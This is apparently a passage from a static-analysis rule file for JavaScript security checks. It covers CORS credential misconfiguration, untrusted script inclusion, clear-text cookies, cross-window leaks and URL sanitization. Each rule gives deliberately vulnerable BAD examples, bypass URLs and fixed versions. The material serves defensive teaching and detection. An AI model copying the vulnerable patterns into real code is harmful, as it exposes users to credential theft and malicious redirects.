require('https'),\n url = require('url');\n\nvar server = https.createServer(function(){});\n\nserver.on('request', function(req, res) {\n let origin = url.parse(req.url, true).query.origin;\n // BAD: attacker can choose the value of origin\n res.setHeader(\"Access-Control-Allow-Origin\", origin);\n res.setHeader(\"Access-Control-Allow-Credentials\", true);\n\n // ...\n});\n\n```\nThis is not secure, since an attacker can choose the value of the `origin` request header to make the browser send credentials to their own server. The use of a whitelist containing allowed origins for the Cross-Origin request fixes the issue:\n\n\n```javascript\nvar https = require('https'),\n url = require('url');\n\nvar server = https.createServer(function(){});\n\nserver.on('request', function(req, res) {\n let origin = url.parse(req.url, true).query.origin,\n whitelist = {\n \"https://example.com\": true,\n \"https://subdomain.example.com\": true,\n \"https://example.com:1337\": true\n };\n\n if (origin in whitelist) {\n // GOOD: the origin is in the whitelist\n res.setHeader(\"Access-Control-Allow-Origin\", origin);\n res.setHeader(\"Access-Control-Allow-Credentials\", true);\n }\n\n // ...\n});\n\n```\n\n## References\n* Mozilla Developer Network: [CORS, Access-Control-Allow-Origin](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Allow-Origin).\n* Mozilla Developer Network: [CORS, Access-Control-Allow-Credentials](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Allow-Credentials).\n* PortSwigger: [Exploiting CORS Misconfigurations for Bitcoins and Bounties](http://blog.portswigger.net/2016/10/exploiting-cors-misconfigurations-for.html)\n* W3C: [CORS for developers, Advice for Resource Owners](https://w3c.github.io/webappsec-cors-for-developers/#resources)\n* Common Weakness Enumeration: [CWE-346](https://cwe.mitre.org/data/definitions/346.html).\n* Common Weakness Enumeration: [CWE-639](https://cwe.mitre.org/data/definitions/639.html).\n* Common Weakness Enumeration: [CWE-942](https://cwe.mitre.org/data/definitions/942.html).\n", - "markdown" : "# CORS misconfiguration for credentials transfer\nA server can send the `\"Access-Control-Allow-Credentials\"` CORS header to control when a browser may send user credentials in Cross-Origin HTTP requests.\n\nWhen the `Access-Control-Allow-Credentials` header is `\"true\"`, the `Access-Control-Allow-Origin` header must have a value different from `\"*\"` in order to make browsers accept the header. Therefore, to allow multiple origins for Cross-Origin requests with credentials, the server must dynamically compute the value of the `\"Access-Control-Allow-Origin\"` header. Computing this header value from information in the request to the server can therefore potentially allow an attacker to control the origins that the browser sends credentials to.\n\n\n## Recommendation\nWhen the `Access-Control-Allow-Credentials` header value is `\"true\"`, a dynamic computation of the `Access-Control-Allow-Origin` header must involve sanitization if it relies on user-controlled input.\n\nSince the `\"null\"` origin is easy to obtain for an attacker, it is never safe to use `\"null\"` as the value of the `Access-Control-Allow-Origin` header when the `Access-Control-Allow-Credentials` header value is `\"true\"`.\n\n\n## Example\nIn the example below, the server allows the browser to send user credentials in a Cross-Origin request. The request header `origins` controls the allowed origins for such a Cross-Origin request.\n\n\n```javascript\nvar https = require('https'),\n url = require('url');\n\nvar server = https.createServer(function(){});\n\nserver.on('request', function(req, res) {\n let origin = url.parse(req.url, true).query.origin;\n // BAD: attacker can choose the value of origin\n res.setHeader(\"Access-Control-Allow-Origin\", origin);\n res.setHeader(\"Access-Control-Allow-Credentials\", true);\n\n // ...\n});\n\n```\nThis is not secure, since an attacker can choose the value of the `origin` request header to make the browser send credentials to their own server. The use of a whitelist containing allowed origins for the Cross-Origin request fixes the issue:\n\n\n```javascript\nvar https = require('https'),\n url = require('url');\n\nvar server = https.createServer(function(){});\n\nserver.on('request', function(req, res) {\n let origin = url.parse(req.url, true).query.origin,\n whitelist = {\n \"https://example.com\": true,\n \"https://subdomain.example.com\": true,\n \"https://example.com:1337\": true\n };\n\n if (origin in whitelist) {\n // GOOD: the origin is in the whitelist\n res.setHeader(\"Access-Control-Allow-Origin\", origin);\n res.setHeader(\"Access-Control-Allow-Credentials\", true);\n }\n\n // ...\n});\n\n```\n\n## References\n* Mozilla Developer Network: [CORS, Access-Control-Allow-Origin](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Allow-Origin).\n* Mozilla Developer Network: [CORS, Access-Control-Allow-Credentials](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Allow-Credentials).\n* PortSwigger: [Exploiting CORS Misconfigurations for Bitcoins and Bounties](http://blog.portswigger.net/2016/10/exploiting-cors-misconfigurations-for.html)\n* W3C: [CORS for developers, Advice for Resource Owners](https://w3c.github.io/webappsec-cors-for-developers/#resources)\n* Common Weakness Enumeration: [CWE-346](https://cwe.mitre.org/data/definitions/346.html).\n* Common Weakness Enumeration: [CWE-639](https://cwe.mitre.org/data/definitions/639.html).\n* Common Weakness Enumeration: [CWE-942](https://cwe.mitre.org/data/definitions/942.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-346", "external/cwe/cwe-639", "external/cwe/cwe-942" ], - "description" : "Misconfiguration of CORS HTTP headers allows for leaks of secret credentials.", - "id" : "js/cors-misconfiguration-for-credentials", - "kind" : "path-problem", - "name" : "CORS misconfiguration for credentials transfer", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "7.5" - } - }, { - "id" : "js/functionality-from-untrusted-source", - "name" : "js/functionality-from-untrusted-source", - "shortDescription" : { - "text" : "Inclusion of functionality from an untrusted source" - }, - "fullDescription" : { - "text" : "Including functionality from an untrusted source may allow an attacker to control the functionality and execute arbitrary code." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Inclusion of functionality from an untrusted source\nIncluding a resource from an untrusted source or using an untrusted channel may allow an attacker to include arbitrary code in the response. When including an external resource (for example, a `script` element or an `iframe` element) on a page, it is important to ensure that the received data is not malicious.\n\nWhen including external resources, it is possible to verify that the responding server is the intended one by using an `https` URL. This prevents a MITM (man-in-the-middle) attack where an attacker might have been able to spoof a server response.\n\nEven when `https` is used, an attacker might still compromise the server. When you use a `script` element, you can check for subresource integrity - that is, you can check the contents of the data received by supplying a cryptographic digest of the expected sources to the `script` element. The script will only load sources that match the digest and an attacker will be unable to modify the script even when the server is compromised.\n\nSubresource integrity checking is commonly recommended when importing a fixed version of a library - for example, from a CDN (content-delivery network). Then, the fixed digest of that version of the library can easily be added to the `script` element's `integrity` attribute.\n\n\n## Recommendation\nWhen an `iframe` element is used to embed a page, it is important to use an `https` URL.\n\nWhen using a `script` element to load a script, it is important to use an `https` URL and to consider checking subresource integrity.\n\n\n## Example\nThe following example loads the jQuery library from the jQuery CDN without using `https` and without checking subresource integrity.\n\n\n```html\n\n \n jQuery demo\n \n \n \n ...\n \n\n```\nInstead, loading jQuery from the same domain using `https` and checking subresource integrity is recommended, as in the next example.\n\n\n```html\n\n \n jQuery demo\n \n \n \n ...\n \n\n```\n\n## References\n* MDN: [Subresource Integrity](https://developer.mozilla.org/en-US/docs/Web/Security/Subresource_Integrity)\n* Smashing Magazine: [Understanding Subresource Integrity](https://www.smashingmagazine.com/2019/04/understanding-subresource-integrity/)\n* Common Weakness Enumeration: [CWE-830](https://cwe.mitre.org/data/definitions/830.html).\n", - "markdown" : "# Inclusion of functionality from an untrusted source\nIncluding a resource from an untrusted source or using an untrusted channel may allow an attacker to include arbitrary code in the response. When including an external resource (for example, a `script` element or an `iframe` element) on a page, it is important to ensure that the received data is not malicious.\n\nWhen including external resources, it is possible to verify that the responding server is the intended one by using an `https` URL. This prevents a MITM (man-in-the-middle) attack where an attacker might have been able to spoof a server response.\n\nEven when `https` is used, an attacker might still compromise the server. When you use a `script` element, you can check for subresource integrity - that is, you can check the contents of the data received by supplying a cryptographic digest of the expected sources to the `script` element. The script will only load sources that match the digest and an attacker will be unable to modify the script even when the server is compromised.\n\nSubresource integrity checking is commonly recommended when importing a fixed version of a library - for example, from a CDN (content-delivery network). Then, the fixed digest of that version of the library can easily be added to the `script` element's `integrity` attribute.\n\n\n## Recommendation\nWhen an `iframe` element is used to embed a page, it is important to use an `https` URL.\n\nWhen using a `script` element to load a script, it is important to use an `https` URL and to consider checking subresource integrity.\n\n\n## Example\nThe following example loads the jQuery library from the jQuery CDN without using `https` and without checking subresource integrity.\n\n\n```html\n\n \n jQuery demo\n \n \n \n ...\n \n\n```\nInstead, loading jQuery from the same domain using `https` and checking subresource integrity is recommended, as in the next example.\n\n\n```html\n\n \n jQuery demo\n \n \n \n ...\n \n\n```\n\n## References\n* MDN: [Subresource Integrity](https://developer.mozilla.org/en-US/docs/Web/Security/Subresource_Integrity)\n* Smashing Magazine: [Understanding Subresource Integrity](https://www.smashingmagazine.com/2019/04/understanding-subresource-integrity/)\n* Common Weakness Enumeration: [CWE-830](https://cwe.mitre.org/data/definitions/830.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-830" ], - "description" : "Including functionality from an untrusted source may allow\n an attacker to control the functionality and execute arbitrary code.", - "id" : "js/functionality-from-untrusted-source", - "kind" : "problem", - "name" : "Inclusion of functionality from an untrusted source", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "6.0" - } - }, { - "id" : "js/clear-text-cookie", - "name" : "js/clear-text-cookie", - "shortDescription" : { - "text" : "Clear text transmission of sensitive cookie" - }, - "fullDescription" : { - "text" : "Sending sensitive information in a cookie without requring SSL encryption can expose the cookie to an attacker." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Clear text transmission of sensitive cookie\nCookies that are transmitted in clear text can be intercepted by an attacker. If sensitive cookies are intercepted, the attacker can read the cookie and use it to perform actions on the user's behalf.\n\n\n## Recommendation\nAlways transmit sensitive cookies using SSL by setting the `secure` attribute on the cookie.\n\n\n## Example\nThe following example stores an authentication token in a cookie that can be transmitted in clear text.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

');\n});\n```\nTo force the cookie to be transmitted using SSL, set the `secure` attribute on the cookie.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}; secure; httpOnly`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

');\n});\n```\n\n## References\n* ExpressJS: [Use cookies securely](https://expressjs.com/en/advanced/best-practice-security.html#use-cookies-securely).\n* OWASP: [Set cookie flags appropriately](https://cheatsheetseries.owasp.org/cheatsheets/Nodejs_Security_Cheat_Sheet.html#set-cookie-flags-appropriately).\n* Mozilla: [Set-Cookie](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie).\n* Common Weakness Enumeration: [CWE-614](https://cwe.mitre.org/data/definitions/614.html).\n* Common Weakness Enumeration: [CWE-311](https://cwe.mitre.org/data/definitions/311.html).\n* Common Weakness Enumeration: [CWE-312](https://cwe.mitre.org/data/definitions/312.html).\n* Common Weakness Enumeration: [CWE-319](https://cwe.mitre.org/data/definitions/319.html).\n", - "markdown" : "# Clear text transmission of sensitive cookie\nCookies that are transmitted in clear text can be intercepted by an attacker. If sensitive cookies are intercepted, the attacker can read the cookie and use it to perform actions on the user's behalf.\n\n\n## Recommendation\nAlways transmit sensitive cookies using SSL by setting the `secure` attribute on the cookie.\n\n\n## Example\nThe following example stores an authentication token in a cookie that can be transmitted in clear text.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

');\n});\n```\nTo force the cookie to be transmitted using SSL, set the `secure` attribute on the cookie.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}; secure; httpOnly`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

');\n});\n```\n\n## References\n* ExpressJS: [Use cookies securely](https://expressjs.com/en/advanced/best-practice-security.html#use-cookies-securely).\n* OWASP: [Set cookie flags appropriately](https://cheatsheetseries.owasp.org/cheatsheets/Nodejs_Security_Cheat_Sheet.html#set-cookie-flags-appropriately).\n* Mozilla: [Set-Cookie](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie).\n* Common Weakness Enumeration: [CWE-614](https://cwe.mitre.org/data/definitions/614.html).\n* Common Weakness Enumeration: [CWE-311](https://cwe.mitre.org/data/definitions/311.html).\n* Common Weakness Enumeration: [CWE-312](https://cwe.mitre.org/data/definitions/312.html).\n* Common Weakness Enumeration: [CWE-319](https://cwe.mitre.org/data/definitions/319.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-614", "external/cwe/cwe-311", "external/cwe/cwe-312", "external/cwe/cwe-319" ], - "description" : "Sending sensitive information in a cookie without requring SSL encryption\n can expose the cookie to an attacker.", - "id" : "js/clear-text-cookie", - "kind" : "problem", - "name" : "Clear text transmission of sensitive cookie", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "5.0" - } - }, { - "id" : "js/cross-window-information-leak", - "name" : "js/cross-window-information-leak", - "shortDescription" : { - "text" : "Cross-window communication with unrestricted target origin" - }, - "fullDescription" : { - "text" : "When sending sensitive information to another window using `postMessage`, the origin of the target window should be restricted to avoid unintentional information leaks." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Cross-window communication with unrestricted target origin\nThe `window.postMessage` method allows different windows or iframes to communicate directly, even if they were loaded from different origins, circumventing the usual same-origin policy.\n\nThe sender of the message can restrict the origin of the receiver by specifying a target origin. If the receiver window does not come from this origin, the message is not sent.\n\nAlternatively, the sender can specify a target origin of `'*'`, which means that any origin is acceptable and the message is always sent.\n\nThis feature should not be used if the message being sent contains sensitive data such as user credentials: the target window may have been loaded from a malicious site, to which the data would then become available.\n\n\n## Recommendation\nIf possible, specify a target origin when using `window.postMessage`. Alternatively, encrypt the sensitive data before sending it to prevent an unauthorized receiver from accessing it.\n\n\n## Example\nThe following example code sends user credentials (in this case, their user name) to `window.parent` without checking its origin. If a malicious site loads the page containing this code into an iframe it would be able to gain access to the user name.\n\n\n```javascript\nwindow.parent.postMessage(userName, '*');\n\n```\nTo prevent this from happening, the origin of the target window should be restricted, as in this example:\n\n\n```javascript\nwindow.parent.postMessage(userName, 'https://github.com');\n\n```\n\n## References\n* Mozilla Developer Network: [Window.postMessage](https://developer.mozilla.org/en-US/docs/Web/API/Window/postMessage).\n* Mozilla Developer Network: [Same-origin policy](https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy).\n* Common Weakness Enumeration: [CWE-201](https://cwe.mitre.org/data/definitions/201.html).\n* Common Weakness Enumeration: [CWE-359](https://cwe.mitre.org/data/definitions/359.html).\n", - "markdown" : "# Cross-window communication with unrestricted target origin\nThe `window.postMessage` method allows different windows or iframes to communicate directly, even if they were loaded from different origins, circumventing the usual same-origin policy.\n\nThe sender of the message can restrict the origin of the receiver by specifying a target origin. If the receiver window does not come from this origin, the message is not sent.\n\nAlternatively, the sender can specify a target origin of `'*'`, which means that any origin is acceptable and the message is always sent.\n\nThis feature should not be used if the message being sent contains sensitive data such as user credentials: the target window may have been loaded from a malicious site, to which the data would then become available.\n\n\n## Recommendation\nIf possible, specify a target origin when using `window.postMessage`. Alternatively, encrypt the sensitive data before sending it to prevent an unauthorized receiver from accessing it.\n\n\n## Example\nThe following example code sends user credentials (in this case, their user name) to `window.parent` without checking its origin. If a malicious site loads the page containing this code into an iframe it would be able to gain access to the user name.\n\n\n```javascript\nwindow.parent.postMessage(userName, '*');\n\n```\nTo prevent this from happening, the origin of the target window should be restricted, as in this example:\n\n\n```javascript\nwindow.parent.postMessage(userName, 'https://github.com');\n\n```\n\n## References\n* Mozilla Developer Network: [Window.postMessage](https://developer.mozilla.org/en-US/docs/Web/API/Window/postMessage).\n* Mozilla Developer Network: [Same-origin policy](https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy).\n* Common Weakness Enumeration: [CWE-201](https://cwe.mitre.org/data/definitions/201.html).\n* Common Weakness Enumeration: [CWE-359](https://cwe.mitre.org/data/definitions/359.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-201", "external/cwe/cwe-359" ], - "description" : "When sending sensitive information to another window using `postMessage`,\n the origin of the target window should be restricted to avoid unintentional\n information leaks.", - "id" : "js/cross-window-information-leak", - "kind" : "path-problem", - "name" : "Cross-window communication with unrestricted target origin", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "4.3" - } - }, { - "id" : "js/incomplete-url-substring-sanitization", - "name" : "js/incomplete-url-substring-sanitization", - "shortDescription" : { - "text" : "Incomplete URL substring sanitization" - }, - "fullDescription" : { - "text" : "Security checks on the substrings of an unparsed URL are often vulnerable to bypassing." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Incomplete URL substring sanitization\nSanitizing untrusted URLs is an important technique for preventing attacks such as request forgeries and malicious redirections. Usually, this is done by checking that the host of a URL is in a set of allowed hosts.\n\nHowever, treating the URL as a string and checking if one of the allowed hosts is a substring of the URL is very prone to errors. Malicious URLs can bypass such security checks by embedding one of the allowed hosts in an unexpected location.\n\nEven if the substring check is not used in a security-critical context, the incomplete check may still cause undesirable behaviors when the check succeeds accidentally.\n\n\n## Recommendation\nParse a URL before performing a check on its host value, and ensure that the check handles arbitrary subdomain sequences correctly.\n\n\n## Example\nThe following example code checks that a URL redirection will reach the `example.com` domain, or one of its subdomains, and not some malicious site.\n\n\n```javascript\napp.get('/some/path', function(req, res) {\n let url = req.param(\"url\");\n // BAD: the host of `url` may be controlled by an attacker\n if (url.includes(\"example.com\")) {\n res.redirect(url);\n }\n});\n\n```\nThe substring check is, however, easy to bypass. For example by embedding `example.com` in the path component: `http://evil-example.net/example.com`, or in the query string component: `http://evil-example.net/?x=example.com`. Address these shortcomings by checking the host of the parsed URL instead:\n\n\n```javascript\napp.get('/some/path', function(req, res) {\n let url = req.param(\"url\"),\n host = urlLib.parse(url).host;\n // BAD: the host of `url` may be controlled by an attacker\n if (host.includes(\"example.com\")) {\n res.redirect(url);\n }\n});\n\n```\nThis is still not a sufficient check as the following URLs bypass it: `http://evil-example.com` `http://example.com.evil-example.net`. Instead, use an explicit whitelist of allowed hosts to make the redirect secure:\n\n\n```javascript\napp.get('/some/path', function(req, res) {\n let url = req.param('url'),\n host = urlLib.parse(url).host;\n // GOOD: the host of `url` can not be controlled by an attacker\n let allowedHosts = [\n 'example.com',\n 'beta.example.com',\n 'www.example.com'\n ];\n if (allowedHosts.includes(host)) {\n res.redirect(url);\n }\n});\n\n```\n\n## References\n* OWASP: [SSRF](https://www.owasp.org/index.php/Server_Side_Request_Forgery)\n* OWASP: [XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n", - "markdown" : "# Incomplete URL substring sanitization\nSanitizing untrusted URLs is an important technique for preventing attacks such as request forgeries and malicious redirections. Usually, this is done by checking that the host of a URL is in a set of allowed hosts.\n\nHowever, treating the URL as a string and checking if one of the allowed hosts is a substring of the URL is very prone to errors. Malicious URLs can bypass such security checks by embedding one of the allowed hosts in an unexpected location.\n\nEven if the substring check is not used in a security-critical context, the incomplete check may still cause undesirable behaviors when the check succeeds accidentally.\n\n\n## Recommendation\nParse a URL before performing a check on its host value, and ensure that the check handles arbitrary subdomain sequences correctly.\n\n\n## Example\nThe following example code checks that a URL redirection will reach the `example.com` domain, or one of its subdomains, and not some malicious site.\n\n\n```javascript\napp.get('/some/path', function(req, res) {\n let url = req.param(\"url\");\n // BAD: the host of `url` may be controlled by an attacker\n if (url.includes(\"example.com\")) {\n res.redirect(url);\n }\n});\n\n```\nThe substring check is, however, easy to bypass. For example by embedding `example.com` in the path component: `http://evil-example.net/example.com`, or in the query string component: `http://evil-example.net/?x=example.com`. Address these shortcomings by checking the host of the parsed URL instead:\n\n\n```javascript\napp.get('/some/path', function(req, res) {\n let url = req.param(\"url\"),\n host = urlLib.parse(url).host;\n // BAD: the host of `url` may be controlled by an attacker\n if (host.includes(\"example.com\")) {\n res.redirect(url);\n }\n});\n\n```\nThis is still not a sufficient check as the following URLs bypass it: `http://evil-example.com` `http://example.com.evil-example.net`. Instead, use an explicit whitelist of allowed hosts to make the redirect secure:\n\n\n```javascript\napp.get('/some/path', function(req, res) {\n let url = req.param('url'),\n host = urlLib.parse(url).host;\n // GOOD: the host of `url` can not be controlled by an attacker\n let allowedHosts = [\n 'example.com',\n 'beta.example.com',\n 'www.example.com'\n ];\n if (allowedHosts.includes(host)) {\n res.redirect(url);\n }\n});\n\n```\n\n## References\n* OWASP: [SSRF](https://www.owasp.org/index.php/Server_Side_Request_Forgery)\n* OWASP: [XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n" - }, - "properties" : { - "tags" : [ "correctness", "security", "external/cwe/cwe-020" ], - "description" : "Security checks on the substrings of an unparsed URL are often vulnerable to bypassing.", - "id" : "js/incomplete-url-substring-sanitization", - "kind" : "problem", - "name" : "Incomplete URL substring sanitization", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "7.8" - } - }, { - "id" : "js/incomplete-hostname-regexp", - "name" : "js/incomplete-hostname-regexp", - "shortDescription" : { - "text" : "Incomplete regular expression for hostnames" - }, - "fullDescription" : { - "text" : "Matching a URL or hostname against a regular expression that contains an unescaped dot as part of the hostname might match more hostnames than expected." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Incomplete regular expression for hostnames\nSanitizing untrusted URLs is an important technique for preventing attacks such as request forgeries and malicious redirections. Often, this is done by checking that the host of a URL is in a set of allowed hosts.\n\nIf a regular expression implements such a check, it is easy to accidentally make the check too permissive by not escaping the `.` meta-characters appropriately. Even if the check is not used in a security-critical context, the incomplete check may still cause undesirable behaviors when it accidentally succeeds.\n\n\n## Recommendation\nEscape all meta-characters appropriately when constructing regular expressions for security checks, and pay special attention to the `.` meta-character.\n\n\n## Example\nThe following example code checks that a URL redirection will reach the `example.com` domain, or one of its subdomains.\n\n\n```javascript\napp.get('/some/path', function(req, res) {\n let url = req.param('url'),\n host = urlLib.parse(url).host;\n // BAD: the host of `url` may be controlled by an attacker\n let regex = /^((www|beta).)?example.com/;\n if (host.match(regex)) {\n res.redirect(url);\n }\n});\n\n```\nThe check is however easy to bypass because the unescaped `.` allows for any character before `example.com`, effectively allowing the redirect to go to an attacker-controlled domain such as `wwwXexample.com`.\n\nAddress this vulnerability by escaping `.` appropriately: `let regex = /^((www|beta)\\.)?example\\.com/`.\n\n\n## References\n* MDN: [Regular Expressions](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_Expressions)\n* OWASP: [SSRF](https://www.owasp.org/index.php/Server_Side_Request_Forgery)\n* OWASP: [XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n", - "markdown" : "# Incomplete regular expression for hostnames\nSanitizing untrusted URLs is an important technique for preventing attacks such as request forgeries and malicious redirections. Often, this is done by checking that the host of a URL is in a set of allowed hosts.\n\nIf a regular expression implements such a check, it is easy to accidentally make the check too permissive by not escaping the `.` meta-characters appropriately. Even if the check is not used in a security-critical context, the incomplete check may still cause undesirable behaviors when it accidentally succeeds.\n\n\n## Recommendation\nEscape all meta-characters appropriately when constructing regular expressions for security checks, and pay special attention to the `.` meta-character.\n\n\n## Example\nThe following example code checks that a URL redirection will reach the `example.com` domain, or one of its subdomains.\n\n\n```javascript\napp.get('/some/path', function(req, res) {\n let url = req.param('url'),\n host = urlLib.parse(url).host;\n // BAD: the host of `url` may be controlled by an attacker\n let regex = /^((www|beta).)?example.com/;\n if (host.match(regex)) {\n res.redirect(url);\n }\n});\n\n```\nThe check is however easy to bypass because the unescaped `.` allows for any character before `example.com`, effectively allowing the redirect to go to an attacker-controlled domain such as `wwwXexample.com`.\n\nAddress this vulnerability by escaping `.` appropriately: `let regex = /^((www|beta)\\.)?example\\.com/`.\n\n\n## References\n* MDN: [Regular Expressions](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_Expressions)\n* OWASP: [SSRF](https://www.owasp.org/index.php/Server_Side_Request_Forgery)\n* OWASP: [XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n" - }, - "properties" : { - "tags" : [ "correctness", "security", "external/cwe/cwe-020" ], - "description" : "Matching a URL or hostname against a regular expression that contains an unescaped dot as part of the hostname might match more hostnames than expected.", - "id" : "js/incomplete-hostname-regexp", - "kind" : "problem", - "name" : "Incomplete regular expression for hostnames", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "7.8" - } - }, { - "id" : "js/incorrect-suffix-check", - "name" : "js/incorrect-suffix-check", - "shortDescription" : { - "text" : "Incorrect suffix check" - }, - "fullDescription" : { - "text" : "Using indexOf to implement endsWith functionality is error-prone if the -1 case is not explicitly handled." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Incorrect suffix check\nThe `indexOf` and `lastIndexOf` methods are sometimes used to check if a substring occurs at a certain position in a string. However, if the returned index is compared to an expression that might evaluate to -1, the check may pass in some cases where the substring was not found at all.\n\nSpecifically, this can easily happen when implementing `endsWith` using `indexOf`.\n\n\n## Recommendation\nUse `String.prototype.endsWith` if it is available. Otherwise, explicitly handle the -1 case, either by checking the relative lengths of the strings, or by checking if the returned index is -1.\n\n\n## Example\nThe following example uses `lastIndexOf` to determine if the string `x` ends with the string `y`:\n\n\n```javascript\nfunction endsWith(x, y) {\n return x.lastIndexOf(y) === x.length - y.length;\n}\n\n```\nHowever, if `y` is one character longer than `x`, the right-hand side `x.length - y.length` becomes -1, which then equals the return value of `lastIndexOf`. This will make the test pass, even though `x` does not end with `y`.\n\nTo avoid this, explicitly check for the -1 case:\n\n\n```javascript\nfunction endsWith(x, y) {\n let index = x.lastIndexOf(y);\n return index !== -1 && index === x.length - y.length;\n}\n\n```\n\n## References\n* MDN: [String.prototype.endsWith](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/endsWith)\n* MDN: [String.prototype.indexOf](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/indexOf)\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n", - "markdown" : "# Incorrect suffix check\nThe `indexOf` and `lastIndexOf` methods are sometimes used to check if a substring occurs at a certain position in a string. However, if the returned index is compared to an expression that might evaluate to -1, the check may pass in some cases where the substring was not found at all.\n\nSpecifically, this can easily happen when implementing `endsWith` using `indexOf`.\n\n\n## Recommendation\nUse `String.prototype.endsWith` if it is available. Otherwise, explicitly handle the -1 case, either by checking the relative lengths of the strings, or by checking if the returned index is -1.\n\n\n## Example\nThe following example uses `lastIndexOf` to determine if the string `x` ends with the string `y`:\n\n\n```javascript\nfunction endsWith(x, y) {\n return x.lastIndexOf(y) === x.length - y.length;\n}\n\n```\nHowever, if `y` is one character longer than `x`, the right-hand side `x.length - y.length` becomes -1, which then equals the return value of `lastIndexOf`. This will make the test pass, even though `x` does not end with `y`.\n\nTo avoid this, explicitly check for the -1 case:\n\n\n```javascript\nfunction endsWith(x, y) {\n let index = x.lastIndexOf(y);\n return index !== -1 && index === x.length - y.length;\n}\n\n```\n\n## References\n* MDN: [String.prototype.endsWith](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/endsWith)\n* MDN: [String.prototype.indexOf](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/indexOf)\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n" - }, - "properties" : { - "tags" : [ "security", "correctness", "external/cwe/cwe-020" ], - "description" : "Using indexOf to implement endsWith functionality is error-prone if the -1 case is not explicitly handled.", - "id" : "js/incorrect-suffix-check", - "kind" : "problem", - "name" : "Incorrect suffix check", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "7.8" - } - }, { - "id" : "js/useless-regexp-character-escape", - "name" : "js/useless-regexp-character-escape", - "shortDescription" : { - "text" : "Useless regular-expression character escape" - }, - "fullDescription" : { - "text" : "Prepending a backslash to an ordinary character in a string does not have any effect, and may make regular expressions constructed from this string behave unexpectedly." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Useless regular-expression character escape\nWhen a character in a string literal or regular expression literal is preceded by a backslash, it is interpreted as part of an escape sequence. For example, the escape sequence `\\n` in a string literal corresponds to a single `newline` character, and not the `\\` and `n` characters. However, not all characters change meaning when used in an escape sequence. In this case, the backslash just makes the character appear to mean something else, and the backslash actually has no effect. For example, the escape sequence `\\k` in a string literal just means `k`. Such superfluous escape sequences are usually benign, and do not change the behavior of the program.\n\nThe set of characters that change meaning when in escape sequences is different for regular expression literals and string literals. This can be problematic when a regular expression literal is turned into a regular expression that is built from one or more string literals. The problem occurs when a regular expression escape sequence loses its special meaning in a string literal.\n\n\n## Recommendation\nEnsure that the right amount of backslashes is used when escaping characters in 